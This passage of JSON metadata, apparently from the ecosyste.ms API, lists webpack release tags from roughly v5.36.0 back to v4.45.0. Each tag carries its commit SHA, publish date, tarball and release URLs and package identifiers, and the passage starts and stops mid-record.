e.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webp